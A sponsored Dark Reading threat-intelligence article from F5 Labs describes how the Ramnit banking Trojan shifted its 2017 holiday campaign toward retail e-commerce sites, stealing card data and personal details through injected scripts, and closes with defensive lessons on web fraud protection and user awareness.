Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Partner Perspectives  Connecting marketers to our tech communities.
SPONSORED BY
2/1/2018
09:00 AM
Doron Voolf
Doron Voolf
Partner Perspectives
Connect Directly
LinkedIn
RSS
50%
50%

Ramnit's Holiday Shopping Spree: Retailers & E-commerce

This past season, the authors of a traditional banking Trojan focused on what people do between Thanksgiving and New Year's Day: shop, eat, check their bank account, and entertain.

F5 security researchers recently analyzed the Ramnit banking Trojan campaign that was active over the holiday season and discovered it’s not much of a banking Trojan anymore. The research showed:

  • 64% of Ramnit's targets were retail e-commerce sites, including Amazon.com, BestBuy, Forever21, Gap, Zara, Carter’s, Oshkosh B’gosh, Macy’s, Victoria’s Secret, H&M, Overstock.com, Toys"R"Us, Zappos, and many others.
  • Although banks were a smaller portion of targets, the target list included some of the largest banks in the world, including Bank of America, CitiBank, PNC, Chase, TD Bank, and US Bank.
  • The C&C framework collecting the stolen user data is shared by several banking Trojans, including Ramnit, Gozi, GootKit, and Tinba.
  • The Ramnit command and control server is registered to a network in Russia, JSC MediaSoft Ekspert, that shows up often in F5 Labs threat research.
  • For the fraud to be accomplished, users must be tricked in several phases, pointing to the need for continued security awareness training.

Ramnit’s authors likely had high hopes for this holiday shopping season when they added major online retailers to their targets, which makes sense if you are a threat actor trying to optimize your attack. Why not expand your fraud net to sites that have a high likelihood of activity over the holidays? Most financial organizations already recognize that the holiday season is also peak fraud season so they elevate their state of security. Additionally, financial institutions have been targeted by banking Trojans for so long that most use advance web defenses to detect if a user is infected with a known Trojan.

Non-financial industries, on the other hand, traditionally haven’t been targeted and are less likely to have the same defenses in place. So, instead of hunting bank account information, the Ramnit authors zeroed in on credit card theft, collecting social security numbers, mothers’ maiden names, secret question answers, and other critical personally identifiable information during the interaction they had with users and the targeted site.

Ramnit Targets: Where People Shop, Eat & Entertain
Retailers and their e-commerce sites were clearly the biggest focus for the Ramnit authors; they accounted for 64% of the targets. Although banks represented a smaller portion, some of the largest banks in the world were included in their effort. The Ramnit authors covered what people do over the holidays: shop, eat, check their bank account, and entertain.

Ramnit 2017 Holiday Targets by Industry (Image Source: F5)
Ramnit 2017 Holiday Targets by Industry (Image Source: F5)

Expansion Is an Easy Shift
The free web testing and monitoring tool Webinjects can perform the same way whether used during online banking interactions or retail purchases. When a user logs into a banking site, in some cases (for example, when the user is accessing from a new system), the bank will ask additional validation questions before granting account access. When browsing e-commerce sites, most sites ask for login details in order to get additional information about a user. Ramnit can inject an external script with an additional request and ask the user for whatever it wants. In this case, the script asked for credit card information in addition to other personal information, including a social security number.

Ramnit Infection Flow
For users to become victims, their device must first be infected with the Trojan. This typically happens through some sort of social engineering attack to trick a user into clicking malicious links or opening attachments that download the Trojan malware. When the infected user accesses a targeted URL, Ramnit triggers an external script to the requested page and sends back the stolen information to a C&C server named Tables.

Ramnit attack path (Image Source F5)
Ramnit attack path (Image Source F5)

There are two major lessons to be learned from this scenario:

Lesson 1: Regardless of industry, advanced web fraud protections should be widely adopted across high traffic web properties that collect personally identifiable user data. What’s notable about fraud on an e-commerce site versus a financial institution is that the impact is typically felt by credit card providers and the users themselves via identity theft, not the e-commerce sites directly. The impact on a financial institution is in dollars drained out of bank accounts that banks must mitigate on behalf of the defrauded user. The process is time consuming and expensive, which gives financial institutions an incentive to purchase additional security controls. The typical e-commerce site not might feel the impacts of banking Trojan fraud in the same way.

Lesson 2: Even though a user has been infected by a malware, there are a lot of steps that must be completed before the fraud is successful. Security awareness is critical for combatting this type of attack. Many financial institutions create security pages where they provide tips for identifying fraud, for example, telling users that their customer service department would never ask for a user’s full social security number or credit card CVV over the phone or web, or to be suspicious of web pages with broken English, incorrect grammar, spelling errors, and strange or misplaced characters.

Get the latest application threat intelligence from F5 Labs.

 

Working at F5 for almost 5 years, Doron handles and analyzes cyber threat investigations for most of the major malware families in recent years. Doron holds a Bachelor of Science focused in Computer Science. View Full Bio
Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
10 Ways to Keep a Rogue RasPi From Wrecking Your Network
Curtis Franklin Jr., Senior Editor at Dark Reading,  7/10/2019
The Security of Cloud Applications
Hillel Solow, CTO and Co-founder, Protego,  7/11/2019
Where Businesses Waste Endpoint Security Budgets
Kelly Sheridan, Staff Editor, Dark Reading,  7/15/2019
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Current Issue
Building and Managing an IT Security Operations Program
As cyber threats grow, many organizations are building security operations centers (SOCs) to improve their defenses. In this Tech Digest you will learn tips on how to get the most out of a SOC in your organization - and what to do if you can't afford to build one.
Flash Poll
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2019-13611
PUBLISHED: 2019-07-16
An issue was discovered in python-engineio through 3.8.2. There is a Cross-Site WebSocket Hijacking (CSWSH) vulnerability that allows attackers to make WebSocket connections to a server by using a victim's credentials, because the Origin header is not restricted.
CVE-2019-0234
PUBLISHED: 2019-07-15
A Reflected Cross-site Scripting (XSS) vulnerability exists in Apache Roller. Roller's Math Comment Authenticator did not property sanitize user input and could be exploited to perform Reflected Cross Site Scripting (XSS). The mitigation for this vulnerability is to upgrade to the latest version of ...
CVE-2018-7838
PUBLISHED: 2019-07-15
A CWE-119 Buffer Errors vulnerability exists in Modicon M580 CPU - BMEP582040, all versions before V2.90, and Modicon Ethernet Module BMENOC0301, all versions before V2.16, which could cause denial of service on the FTP service of the controller or the Ethernet BMENOC module when it receives a FTP C...
CVE-2019-6822
PUBLISHED: 2019-07-15
A Use After Free: CWE-416 vulnerability exists in Zelio Soft 2, V5.2 and earlier, which could cause remote code execution when opening a specially crafted Zelio Soft 2 project file.
CVE-2019-6823
PUBLISHED: 2019-07-15
A CWE-94: Code Injection vulnerability exists in ProClima (all versions prior to version 8.0.0) which could allow an unauthenticated, remote attacker to execute arbitrary code on the targeted system in all versions of ProClima prior to version 8.0.0.